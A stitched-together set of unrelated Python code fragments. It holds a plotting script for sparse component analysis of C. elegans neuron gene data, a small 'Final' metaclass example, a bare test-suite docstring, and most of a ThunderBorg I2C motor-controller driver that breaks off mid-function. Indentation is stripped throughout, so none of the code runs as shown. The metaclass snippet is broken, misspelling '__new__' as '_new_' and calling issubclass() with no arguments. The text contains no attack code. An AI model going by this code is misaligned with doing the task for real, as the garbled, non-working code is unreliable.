# stashfig("pairplot-sca-celegans-genes")
#%% train vs test PVE
# TODO this one not really done, not sure if worth showing
# X_test = scaler.transform(X_test)
# X_test_pca = pca.transform(X_test)
# explained_variance_pca = calculate_explained_variance_ratio(X_test, pca.components_.T)
# X_test_sca = sca.transform(X_test)
# explained_variance_sca = calculate_explained_variance_ratio(X_test, sca.components_.T)
# fig, ax = plt.subplots(1, 1, figsize=(8, 4))
# plt.plot(explained_variance_pca)
# plt.plot(explained_variance_sca)
#%%
gamma = gammas[0]
sca = models_by_gamma[gamma]
X_transformed = Xs_by_gamma[gamma]
def make_neuron_df(X_transformed):
columns = [f"component_score_{i}" for i in range(n_components)]
neuron_df = pd.DataFrame(index=index_train, data=X_transformed, columns=columns,)
# neuron_df["neuron_type"] = scrna_meta.loc[index_train, "Neuron_type"]
neuron_df = neuron_df.reset_index(level="Neuron_type")
neuron_df.rename(columns={"Neuron_type": "neuron_type"}, inplace=True)
for c in columns:
neuron_df["abs_" + c] = np.abs(neuron_df[c])
return neuron_df
def make_genes_annotations(component):
nonzero_inds = np.nonzero(component)[0]
magnitude_sort_inds = np.argsort(np.abs(component[nonzero_inds]))[::-1]
nonzero_inds = nonzero_inds[magnitude_sort_inds]
select_gene_names = gene_index[nonzero_inds].copy()
select_genes = pd.DataFrame(select_gene_names)
select_gene_names = select_gene_names.values
# select_genes = gene_df.loc[select_gene_index].copy()
select_genes["component_val"] = component[nonzero_inds]
select_genes["component_ind"] = nonzero_inds
select_genes = select_genes.set_index("genes")
# select_gene_names = select_genes["gene_symbol"]
select_annotation_genes = annotation_df[
annotation_df["gene"].isin(select_gene_names)
]
# select_genes = select_genes.reset_index().set_index("gene_symbol")
select_genes["cell_annotations"] = ""
for _, row in select_annotation_genes.iterrows():
select_genes.loc[row["gene"], "cell_annotations"] += (
str(row["neuron_class"]) + ","
)
return select_genes
#%%
neuron_df = make_neuron_df(X_transformed)
for i in range(n_components):
component = sca.components_[i].copy()
sign = np.sign(np.max(component[np.nonzero(component)]))
component *= sign # flip to positive at least for plotting
select_genes = make_genes_annotations(component)
# also flip the scores for plotting
# select_genes["component_val"] = select_genes["component_val"] * sign
neuron_df[f"component_score_{i}"] *= sign
median_mags = neuron_df.groupby("neuron_type")[f"abs_component_score_{i}"].agg(
np.median
)
median_mags = median_mags.sort_values(ascending=False)
neuron_types = median_mags.index.values
fig, axs = plt.subplots(
3,
1,
figsize=(6, 8),
gridspec_kw=dict(height_ratios=[0.4, 0.2, 0.4], hspace=0.06),
)
y_max = neuron_df[f"component_score_{i}"].max()
y_min = neuron_df[f"component_score_{i}"].min()
y_range = y_max - y_min
y_max += 0.05 * y_range
y_min -= 0.05 * y_range
n_per_row = 20
row_neuron_types = neuron_types[:n_per_row]
ax = axs[0]
sns.stripplot(
data=neuron_df[neuron_df["neuron_type"].isin(row_neuron_types)],
x="neuron_type",
y=f"component_score_{i}",
hue="neuron_type",
hue_order=row_neuron_types, # ensures sorting stays the same
order=row_neuron_types, # ensures sorting stays the same
palette=neuron_type_palette,
jitter=0.35,
ax=ax,
s=3,
alpha=0.7,
)
ax.get_legend().remove()
ax.set(
xlim=(-1, n_per_row),
ylim=(y_min, y_max),
xlabel=f"Top {n_per_row} cell types",
ylabel="Score",
yticks=[0],
yticklabels=[0],
)
ax.axhline(0, color="black", linestyle=":", linewidth=1)
ax.tick_params(length=0, labelsize="xx-small")
plt.setp(
ax.get_xticklabels(),
rotation=90,
rotation_mode="anchor",
ha="right",
va="center",
)
for tick in ax.get_xticklabels():
text = tick.get_text()
tick.set_color(neuron_type_palette[text])
ax = axs[2]
plot_select_genes = select_genes.reset_index()
plot_select_genes = plot_select_genes.iloc[:n_per_row]
plot_select_genes["x"] = range(len(plot_select_genes))
sns.scatterplot(
data=plot_select_genes, x="x", y="component_val", color="black", s=30
)
ax.xaxis.set_major_locator(plt.FixedLocator(np.arange(n_per_row)))
ax.xaxis.set_major_formatter(plt.FixedFormatter(plot_select_genes["genes"].values))
ax.tick_params(length=0, labelsize="xx-small")
plt.setp(
ax.get_xticklabels(),
rotation=90,
rotation_mode="anchor",
ha="right",
va="center",
)
ax.axhline(0, color="black", linestyle=":", linewidth=1)
ax.yaxis.set_major_locator(plt.FixedLocator([0]))
ax.yaxis.set_major_formatter(plt.FixedFormatter([0]))
ax.set(
xlim=(-1, n_per_row), xlabel=f"Top {n_per_row} genes", ylabel="Loading",
)
annot_ax = axs[1]
annot_ax.set_zorder(-1)
sns.utils.despine(ax=annot_ax, left=True, bottom=True)
annot_ax.set(xlim=(-1, n_per_row), ylim=(0, 1.5), xticks=[], yticks=[], ylabel="")
y_min, y_max = ax.get_ylim()
y_range = y_max - y_min
for x, row in plot_select_genes.iterrows():
if row["cell_annotations"] != "":
cell_types = np.unique(row["cell_annotations"].split(",")[:-1])
cell_types = [
cell_type
for cell_type in cell_types
if cell_type in neuron_type_palette
]
y_last = y_min
for c, cell_type in enumerate(cell_types):
if cell_type in neuron_type_palette:
y_top = y_last + y_range / len(cell_types)
ax.fill_between(
(x - 0.5, x + 0.5),
y_last,
y_top,
color=neuron_type_palette[cell_type],
alpha=1,
zorder=-1,
facecolor="white",
)
y_last = y_top
cell_loc = np.where(row_neuron_types == cell_type)[0]
if len(cell_loc) > 0:
annot_ax.plot(
[x, cell_loc[0]],
[0.02, 1],
color=neuron_type_palette[cell_type],
)
fig.suptitle(f"Component {i + 1}", y=0.93)
stashfig(f"component_{i+1}_relationplot-gamma={int(gamma)}.png", format="png")
|
python
|
class Final(type):
def _new_(meta,name,bases,attrs):
if issubclass():
raise TypeError
return super()._new_(meta,name,bases,attrs)
class Sealed(metaclass=Final):pass
class ShouldFail(Sealed):pass
|
python
|
"""COUNTER 5 test suite"""
|
python
|
# -*- coding: utf-8 -*-
#
# tborg/tborg.py
#
"""
The TunderBorg API
by Carl J. Nobile
THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import absolute_import
__docformat__ = "restructuredtext en"
import io
import fcntl
import types
import time
import logging
import six
_LEVEL_TO_NAME = logging._levelNames if six.PY2 else logging._levelToName
class ThunderBorgException(Exception):
pass
class ThunderBorg(object):
"""
This module is designed to communicate with the ThunderBorg motor
controller board.
"""
#.. autoclass: tborg.ThunderBorg
# :members:
#
# sudo i2cdetect -y 1
_DEF_LOG_LEVEL = logging.WARNING
_DEVICE_PREFIX = '/dev/i2c-{}'
DEFAULT_BUS_NUM = 1 # Rev. 2 boards
"""Default I²C bus number."""
DEFAULT_I2C_ADDRESS = 0x15
"""Default I²C address of the ThunderBorg board."""
_POSSIBLE_BUSS = [0, 1]
_I2C_ID_THUNDERBORG = 0x15
_I2C_SLAVE = 0x0703
_I2C_READ_LEN = 6
_PWM_MAX = 255
_VOLTAGE_PIN_MAX = 36.3
"""Maximum voltage from the analog voltage monitoring pin"""
_VOLTAGE_PIN_CORRECTION = 0.0
"""Correction value for the analog voltage monitoring pin"""
_BATTERY_MIN_DEFAULT = 7.0
"""Default minimum battery monitoring voltage"""
_BATTERY_MAX_DEFAULT = 35.0
"""Default maximum battery monitoring voltage"""
# Commands
COMMAND_SET_LED1 = 1
"""Set the color of the ThunderBorg LED"""
COMMAND_GET_LED1 = 2
"""Get the color of the ThunderBorg LED"""
COMMAND_SET_LED2 = 3
"""Set the color of the ThunderBorg Lid LED"""
COMMAND_GET_LED2 = 4
"""Get the color of the ThunderBorg Lid LED"""
COMMAND_SET_LEDS = 5
"""Set the color of both the LEDs"""
COMMAND_SET_LED_BATT_MON = 6
"""Set the color of both LEDs to show the current battery level"""
COMMAND_GET_LED_BATT_MON = 7
"""Get the state of showing the current battery level via the LEDs"""
COMMAND_SET_A_FWD = 8
"""Set motor A PWM rate in a forwards direction"""
COMMAND_SET_A_REV = 9
"""Set motor A PWM rate in a reverse direction"""
COMMAND_GET_A = 10
"""Get motor A direction and PWM rate"""
COMMAND_SET_B_FWD = 11
"""Set motor B PWM rate in a forwards direction"""
COMMAND_SET_B_REV = 12
"""Set motor B PWM rate in a reverse direction"""
COMMAND_GET_B = 13
"""Get motor B direction and PWM rate"""
COMMAND_ALL_OFF = 14
"""Switch everything off"""
COMMAND_GET_DRIVE_A_FAULT = 15
"""
Get the drive fault flag for motor A, indicates faults such as
short-circuits and under voltage.
"""
COMMAND_GET_DRIVE_B_FAULT = 16
"""
Get the drive fault flag for motor B, indicates faults such as
short-circuits and under voltage
"""
COMMAND_SET_ALL_FWD = 17
"""Set all motors PWM rate in a forwards direction"""
COMMAND_SET_ALL_REV = 18
"""Set all motors PWM rate in a reverse direction"""
COMMAND_SET_FAILSAFE = 19
"""
Set the failsafe flag, turns the motors off if communication is
interrupted.
"""
COMMAND_GET_FAILSAFE = 20
"""Get the failsafe flag"""
COMMAND_GET_BATT_VOLT = 21
"""Get the battery voltage reading"""
COMMAND_SET_BATT_LIMITS = 22
"""Set the battery monitoring limits"""
COMMAND_GET_BATT_LIMITS = 23
"""Get the battery monitoring limits"""
COMMAND_WRITE_EXTERNAL_LED = 24
"""Write a 32bit pattern out to SK9822 / APA102C"""
COMMAND_GET_ID = 0x99
"""Get the board identifier"""
COMMAND_SET_I2C_ADD = 0xAA
"""Set a new I²C address"""
COMMAND_VALUE_FWD = 1
"""I²C value representing forward"""
COMMAND_VALUE_REV = 2
"""I²C value representing reverse"""
COMMAND_VALUE_OFF = 0
"""I²C value representing off"""
COMMAND_VALUE_ON = 1
"""I²C value representing on"""
COMMAND_ANALOG_MAX = 0x3FF
"""Maximum value for analog readings"""
def __init__(self,
bus_num=DEFAULT_BUS_NUM,
address=DEFAULT_I2C_ADDRESS,
logger_name='',
log_level=_DEF_LOG_LEVEL,
auto_set_addr=False,
static_init=False):
"""
Setup logging and initialize the ThunderBorg motor driver board.
:param bus_num: The I²C bus number, defaults to {1:d}.
:type bus_num: int
:param address: The I²C address to use, defaults to 0x{0:02X}.
:type address: int
:param logger_name: The name of the logger to log to, defaults to
the root logger.
:type logger_name: str
:param log_level: The lowest log level to log, defaults to {2:s}.
:type log_level: int
:param auto_set_addr: If set to `True` will use the first board
that is found. Default is `False`.
:type auto_set_addr: bool
:param static_init: If called by a public class method.
:type static_init: bool
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream or an
invalid address or bus was provided.
"""
# Setup logging
if logger_name == '':
logging.basicConfig()
self._log = logging.getLogger(logger_name)
self._log.setLevel(log_level)
if not static_init:
self._initialize_board(bus_num, address, auto_set_addr)
__init__.__doc__ = __init__.__doc__.format(
_I2C_ID_THUNDERBORG, DEFAULT_BUS_NUM, _LEVEL_TO_NAME[_DEF_LOG_LEVEL])
def _initialize_board(self, bus_num, address, auto_set_addr):
"""
Setup the I²C connections and file streams for read and write. If
the default board cannot be found search for a board and if
``auto_set_addr`` is ``True`` configure the found board.
"""
if not self._is_thunder_borg_board(bus_num, address, self):
err_msg = "ThunderBorg not found on bus %s at address 0x%02X"
self._log.error(err_msg, bus_num, address)
buss = [bus for bus in self._POSSIBLE_BUSS
if not auto_set_addr and bus != bus_num]
found_chip = False
for bus in buss:
found_chip = self._is_thunder_borg_board(bus, address, self)
if not found_chip:
self._log.error(err_msg, bus, address)
if (not found_chip
and (not auto_set_addr or
(auto_set_addr
and not self._auto_set_address(bus_num, self)))):
msg = ("ThunderBorg could not be found; is it properly "
"attached, the correct address used, and the I2C "
"driver module loaded?")
self._log.critical(msg)
raise ThunderBorgException(msg)
#
# Class Methods
#
@classmethod
def _is_thunder_borg_board(cls, bus_num, address, tb):
"""
Try to initialize a board on a given bus and address.
"""
tb._log.debug("Loading ThunderBorg on bus number %d, address 0x%02X",
cls.DEFAULT_BUS_NUM, address)
found_chip = False
if cls._init_bus(bus_num, address, tb):
try:
recv = tb._read(cls.COMMAND_GET_ID, cls._I2C_READ_LEN)
except KeyboardInterrupt as e: # pragma: no cover
tb.close_streams()
tb._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e:
pass
else:
found_chip = cls._check_board_chip(recv, bus_num, address, tb)
return found_chip
@classmethod
def _init_bus(cls, bus_num, address, tb):
"""
Check that the bus exists then initialize the board on the given
address.
"""
device_found = False
device = cls._DEVICE_PREFIX.format(bus_num)
try:
tb._i2c_read = io.open(device, mode='rb', buffering=0)
tb._i2c_write = io.open(device, mode='wb', buffering=0)
except (IOError, OSError) as e: # pragma: no cover
tb.close_streams()
msg = ("Could not open read or write stream on bus {:d} at "
"address 0x{:02X}, {}").format(bus_num, address, e)
tb._log.critical(msg)
else:
try:
fcntl.ioctl(tb._i2c_read, cls._I2C_SLAVE, address)
fcntl.ioctl(tb._i2c_write, cls._I2C_SLAVE, address)
except (IOError, OSError) as e: # pragma: no cover
tb.close_streams()
msg = ("Failed to initialize ThunderBorg on bus number {:d}, "
"address 0x{:02X}, {}").format(bus_num, address, e)
tb._log.critical(msg)
else:
device_found = True
return device_found
@classmethod
def _check_board_chip(cls, recv, bus_num, address, tb):
found_chip = False
length = len(recv)
if length == cls._I2C_READ_LEN:
if recv[1] == cls._I2C_ID_THUNDERBORG:
found_chip = True
msg = "Found ThunderBorg on bus '%d' at address 0x%02X."
tb._log.info(msg, bus_num, address)
else:
msg = ("Found a device at 0x%02X on bus number %d, but it is "
"not a ThunderBorg (ID 0x%02X instead of 0x%02X).")
tb._log.info(msg, address, bus_num, recv[1],
cls._I2C_ID_THUNDERBORG)
else: # pragma: no cover
msg = ("Wrong number of bytes received, found '%d', should be "
"'%d' at address 0x%02X.")
tb._log.error(msg, length, cls._I2C_READ_LEN, address)
return found_chip
@classmethod
def _auto_set_address(cls, bus_num, tb):
found_chip = False
boards = cls.find_board(tb=tb, close=False)
msg = "Found ThunderBorg(s) on bus '%d' at address %s."
hex_boards = ', '.join(['0x%02X' % b for b in boards])
tb._log.warning(msg, bus_num, hex_boards)
if boards:
found_chip = cls._is_thunder_borg_board(bus_num, boards[0], tb)
return found_chip
@classmethod
def find_board(cls, bus_num=DEFAULT_BUS_NUM, tb=None, close=True,
logger_name=''):
"""
Scans the I²C bus for ThunderBorg boards and returns a list of
all usable addresses.
.. note::
Rev 1 boards use bus number 0 and rev 2 boards use bus number 1.
:param bus_num: The bus number where the address will be scanned.
Default bus number is 1.
:type bus_num: int
:param tb: Use a pre-existing ThunderBorg instance. Default is `None`.
:type tb: ThunderBorg instance
:param close: Default is `True` to close the stream before exiting.
:type close: bool
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
found = []
if not tb: tb = ThunderBorg(logger_name=logger_name,
log_level=logging.INFO,
static_init=True)
tb._log.info("Scanning I2C bus number %d.", bus_num)
for address in range(0x03, 0x77, 1):
if cls._is_thunder_borg_board(bus_num, address, tb):
found.append(address)
if close: tb.close_streams()
if len(found) == 0: # pragma: no cover
msg = ("No ThunderBorg boards found, is the bus number '%d' "
"correct? (should be 0 for Rev 1 and 1 for Rev 2)")
tb._log.error(msg, bus_num)
return found
@classmethod
def set_i2c_address(cls, new_addr, cur_addr=-1, bus_num=DEFAULT_BUS_NUM,
logger_name=''):
"""
Scans the I²C bus for the first ThunderBorg and sets it to a
new I²C address. If cur_addr is supplied it will change the
address of the board at that address rather than scanning the bus.
The bus_num if supplied determines which I²C bus to scan using
0 for Rev 1 or 1 for Rev 2 boards. If bum_bus is not supplied it
defaults to 1.
Warning, this new I²C address will still be used after
resetting the power on the device.
:param new_addr: New address to set a ThunderBorg board to.
:type new_addr: int
:param cur_addr: The current address of a ThunderBorg board. The
default of `-1` will scan the entire range.
:type cur_addr: int
:param bun_num: The bus number where the address range will be
found. Default is set to 1.
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream or
failed to set the new address.
"""
tb = ThunderBorg(log_level=logging.INFO, logger_name=logger_name,
static_init=True)
if not (0x03 <= new_addr <= 0x77):
msg = ("Error, I2C addresses must be in the range "
"of 0x03 to 0x77")
tb._log.error(msg)
raise ThunderBorgException(msg)
if cur_addr < 0x00:
found = cls.find_board(bus_num=bus_num, tb=tb)
if len(found) < 1: # pragma: no cover
msg = ("No ThunderBorg boards found, cannot set a new "
"I2C address!")
tb._log.info(msg)
raise ThunderBorgException(msg)
cur_addr = found[0]
msg = "Changing I2C address from 0x%02X to 0x%02X on bus number %d."
tb._log.info(msg, cur_addr, new_addr, bus_num)
if cls._init_bus(bus_num, cur_addr, tb):
try:
recv = tb._read(cls.COMMAND_GET_ID, cls._I2C_READ_LEN)
except KeyboardInterrupt as e: # pragma: no cover
tb.close_streams()
tb._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
tb.close_streams()
msg = "Missing ThunderBorg at address 0x%02X."
tb._log.error(msg, cur_addr)
raise ThunderBorgException(msg)
else:
if cls._check_board_chip(recv, bus_num, cur_addr, tb):
tb._write(cls.COMMAND_SET_I2C_ADD, [new_addr])
time.sleep(0.1)
msg = ("Address changed to 0x%02X, attempting to talk "
"with the new address.")
tb._log.info(msg, new_addr)
if cls._init_bus(bus_num, new_addr, tb):
try:
recv = tb._read(cls.COMMAND_GET_ID,
cls._I2C_READ_LEN)
except KeyboardInterrupt as e: # pragma: no cover
tb.close_streams()
tb._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
tb.close_streams()
msg = ("Missing ThunderBorg at address 0x{:02X}."
).format(new_addr)
tb._log.error(msg)
raise ThunderBorgException(msg)
else:
if cls._check_board_chip(recv, bus_num,
new_addr, tb):
msg = ("New I2C address of 0x{:02X} set "
"successfully.").format(new_addr)
tb._log.info(msg)
else: # pragma: no cover
msg = ("Failed to set address to 0x{:02X}"
).format(new_addr)
tb._log.error(msg)
raise ThunderBorgException(msg)
tb.close_streams()
#
# Instance Methods
#
def close_streams(self):
"""
Close both streams if the ThunderBorg was not found and when we
are shutting down. We don't want memory leaks.
"""
if hasattr(self, '_i2c_read'):
self._i2c_read.close()
self._log.debug("I2C read stream is now closed.")
if hasattr(self, '_i2c_write'):
self._i2c_write.close()
self._log.debug("I2C write stream is now closed.")
def _write(self, command, data):
"""
Write data to the `ThunderBorg`.
:param command: Command to send to the `ThunderBorg`.
:type command: int
:param data: The data to be sent to the I²C bus.
:type data: list
:raises ThunderBorgException: If the 'data' argument is the wrong
type.
"""
assert isinstance(data, list), (
"Programming error, the 'data' argument must be of type list.")
assert hasattr(self, '_i2c_write'), (
"Programming error, the write stream has not been initialized")
assert hasattr(self._i2c_write, 'write'), (
"Programming error, the write stream object is not a stream.")
data.insert(0, command)
if six.PY2: # pragma: no cover
# Either PY2 or PY3 can be tested at a given time.
data = ''.join([chr(byte) for byte in data])
else:
data = bytes(data)
try:
self._i2c_write.write(data)
except ValueError as e: # pragma: no cover
msg = "{}".format(e)
self._log.error(msg)
raise ThunderBorgException(msg)
def _read(self, command, length, retry_count=3):
"""
Reads data from the `ThunderBorg`.
:param command: Command to send to the `ThunderBorg`.
:type command: int
:param length: The number of bytes to read from the `ThunderBorg`.
:type length: int
:param retry_count: Number of times to retry the read. Default is 3.
:type retry_count: int
:rtype: A list of bytes returned from the `ThunderBorg`.
:raises ThunderBorgException: If reading a command failed.
"""
assert hasattr(self, '_i2c_read'), (
"Programming error, the read stream has not been initialized")
assert hasattr(self._i2c_read, 'read'), (
"Programming error, the read stream object is not a stream.")
for i in range(retry_count):
self._write(command, [])
recv = self._i2c_read.read(length)
# Split string/bytes
# b'\x99\x15\x00\x00\x00\x00' [153, 21, 0, 0, 0, 0]
if six.PY2: # pragma: no cover
# Either PY2 or PY3 can be tested at a given time.
data = [ord(bt) for bt in recv]
else:
data = [bt for bt in recv]
if command == data[0]:
break
if len(data) <= 0: # pragma: no cover
msg = "I2C read for command '{}' failed.".format(command)
self._log.error(msg)
raise ThunderBorgException(msg)
return data
def _set_motor(self, level, fwd, rev):
if level < 0:
# Reverse
command = rev
pwm = -int(self._PWM_MAX * level)
pwm = self._PWM_MAX if pwm < -self._PWM_MAX else pwm
else:
# Forward / stopped
command = fwd
pwm = int(self._PWM_MAX * level)
pwm = self._PWM_MAX if pwm > self._PWM_MAX else pwm
try:
self._write(command, [pwm])
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
motor = 1 if fwd == self.COMMAND_SET_A_FWD else 2
msg = "Failed sending motor %d drive level, %s"
self._log.error(msg, motor, e)
raise ThunderBorgException(msg)
def set_motor_one(self, level):
"""
Set the drive level for motor one.
:param level: Valid levels are from -1.0 to +1.0.
A level of 0.0 is full stop.
A level of 0.75 is 75% forward.
A level of -0.25 is 25% reverse.
A level of 1.0 is 100% forward.
:type level: float
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
self._set_motor(level, self.COMMAND_SET_A_FWD, self.COMMAND_SET_A_REV)
def set_motor_two(self, level):
"""
Set the drive level for motor two.
:param level: Valid levels are from -1.0 to +1.0.
A level of 0.0 is full stop.
A level of 0.75 is 75% forward.
A level of -0.25 is 25% reverse.
A level of 1.0 is 100% forward.
:type level: float
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
self._set_motor(level, self.COMMAND_SET_B_FWD, self.COMMAND_SET_B_REV)
def set_both_motors(self, level):
"""
Set the drive level for motor two.
:param level: Valid levels are from -1.0 to +1.0.
A level of 0.0 is full stop.
A level of 0.75 is 75% forward.
A level of -0.25 is 25% reverse.
A level of 1.0 is 100% forward.
:type level: float
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
self._set_motor(level, self.COMMAND_SET_ALL_FWD,
self.COMMAND_SET_ALL_REV)
def _get_motor(self, command):
"""
Base motor speed retrival method.
:param command:
"""
motor = 1 if command == self.COMMAND_GET_A else 2
try:
recv = self._read(command, self._I2C_READ_LEN)
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
msg = "Failed reading motor %d drive level, {}".format(motor, e)
self._log.error(msg)
raise ThunderBorgException(msg)
level = float(recv[2]) / self._PWM_MAX
direction = recv[1]
if direction == self.COMMAND_VALUE_REV:
level = -level
elif direction != self.COMMAND_VALUE_FWD: # pragma: no cover
msg = ("Invalid command '{:02d}' while getting drive level "
"for motor {:d}.").format(direction, motor)
self._log.error(msg)
raise ThunderBorgException(msg)
return level
def get_motor_one(self):
"""
Get the drive level of motor one.
:rtype: The motor drive level.
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
return self._get_motor(self.COMMAND_GET_A)
def get_motor_two(self):
"""
Get the drive level of motor two.
:rtype: The motor drive level.
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
return self._get_motor(self.COMMAND_GET_B)
def halt_motors(self):
"""
Halt both motors. Should be used when ending a program or
when needing to come to an abrupt halt. Executing
``set_both_motors(0)`` essentially does the same thing.
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
try:
self._write(self.COMMAND_ALL_OFF, [0])
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
msg = "Failed sending motors halt command, {}".format(e)
self._log.error(msg)
raise ThunderBorgException(msg)
else:
self._log.debug("Both motors were halted successfully.")
def _set_led(self, command, r, g, b):
level_r = max(0, min(self._PWM_MAX, int(r * self._PWM_MAX)))
level_g = max(0, min(self._PWM_MAX, int(g * self._PWM_MAX)))
level_b = max(0, min(self._PWM_MAX, int(b * self._PWM_MAX)))
try:
self._write(command, [level_r, level_g, level_b])
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
msg = "Failed sending color to the ThunderBorg LED one."
self._log.error(msg)
raise ThunderBorgException(msg)
def set_led_one(self, r, g, b):
"""
Set the color of the ThunderBorg LED number one.
.. note::
1. (0, 0, 0) LED off
2. (1, 1, 1) LED full white
3. (1.0, 0.5, 0.0) LED bright orange
4. (0.2, 0.0, 0.2) LED dull violet
:param r: Range is between 0.0 and 1.0.
:type r: float
:param g: Range is between 0.0 and 1.0.
:type g: float
:param b: Range is between 0.0 and 1.0.
:type b: float
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
self._set_led(self.COMMAND_SET_LED1, r, g, b)
def set_led_two(self, r, g, b):
"""
Set the color of the ThunderBorg LED number two.
.. note::
1. (0, 0, 0) LED off
2. (1, 1, 1) LED full white
3. (1.0, 0.5, 0.0) LED bright orange
4. (0.2, 0.0, 0.2) LED dull violet
:param r: Range is between 0.0 and 1.0.
:type r: float
:param g: Range is between 0.0 and 1.0.
:type g: float
:param b: Range is between 0.0 and 1.0.
:type b: float
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
self._set_led(self.COMMAND_SET_LED2, r, g, b)
def set_both_leds(self, r, g, b):
"""
Set the color of both of the ThunderBorg LEDs
.. note::
1. (0, 0, 0) LED off
2. (1, 1, 1) LED full white
3. (1.0, 0.5, 0.0) LED bright orange
4. (0.2, 0.0, 0.2) LED dull violet
:param r: Range is between 0.0 and 1.0.
:type r: float
:param g: Range is between 0.0 and 1.0.
:type g: float
:param b: Range is between 0.0 and 1.0.
:type b: float
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
self._set_led(self.COMMAND_SET_LEDS, r, g, b)
def _get_led(self, command):
try:
recv = self._read(command, self._I2C_READ_LEN)
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
led = 1 if command == self.COMMAND_GET_LED1 else 2
msg = "Failed to read ThunderBorg LED {} color, {}".format(led, e)
self._log.error(msg)
raise ThunderBorgException(msg)
else:
r = recv[1] / float(self._PWM_MAX)
g = recv[2] / float(self._PWM_MAX)
b = recv[3] / float(self._PWM_MAX)
return r, g, b
def get_led_one(self):
"""
Get the current RGB color of the ThunderBorg LED number one.
.. note::
1. (0, 0, 0) LED off
2. (1, 1, 1) LED full white
3. (1.0, 0.5, 0.0) LED bright orange
4. (0.2, 0.0, 0.2) LED dull violet
:rtype: Return a tuple of the RGB color for LED number one.
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
return self._get_led(self.COMMAND_GET_LED1)
def get_led_two(self):
"""
Get the current RGB color of the ThunderBorg LED number two.
.. note::
1. (0, 0, 0) LED off
2. (1, 1, 1) LED full white
3. (1.0, 0.5, 0.0) LED bright orange
4. (0.2, 0.0, 0.2) LED dull violet
:rtype: Return a tuple of the RGB color for LED number two.
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
return self._get_led(self.COMMAND_GET_LED2)
def set_led_battery_state(self, state):
"""
Change from the default LEDs state (set with `set_led_one` and/or
`set_led_two`) to the battery monitoring state.
.. note::
If in the battery monitoring state the configured state is
disabled. The battery monitoring state sweeps the full range
between red (7V) and green (35V).
:param state: If `True` (enabled) LEDs will show the current
battery level, else if `False` (disabled) the LEDs
will be controlled with the `set_led_*` and the
`set_both_leds` methods.
:type state: bool
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
level = self.COMMAND_VALUE_ON if state else self.COMMAND_VALUE_OFF
try:
self._write(self.COMMAND_SET_LED_BATT_MON, [level])
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
msg = "Failed to send LEDs state change, {}".format(e)
self._log.error(msg)
raise ThunderBorgException(msg)
def get_led_battery_state(self):
"""
Get the state of the LEDs between the default and the battery
monitoring state.
:rtype: Return `False` for the default state and `True` for
the battery monitoring state.
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
try:
recv = self._read(self.COMMAND_GET_LED_BATT_MON,
self._I2C_READ_LEN)
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
msg = "Failed reading LED state, {}".format(e)
self._log.error(msg)
raise ThunderBorgException(msg)
return False if recv[1] == self.COMMAND_VALUE_OFF else True
def set_comms_failsafe(self, state):
"""
Set the state of the motor failsafe. The default failsafe state
of ``False`` will cause the motors to continuously run without a
keepalive signal. If set to ``True`` the motors will shutdown
after 1/4 of a second unless it is sent the speed command every
1/4 of a second.
:param state: If set to ``True`` failsafe is enabled, else if set
to ``False`` failsafe is disabled. Default is
disables when powered on.
:type state: bool
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
level = self.COMMAND_VALUE_ON if state else self.COMMAND_VALUE_OFF
try:
self._write(self.COMMAND_SET_FAILSAFE, [level])
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
msg = "Failed sending communications failsafe state, {}".format(e)
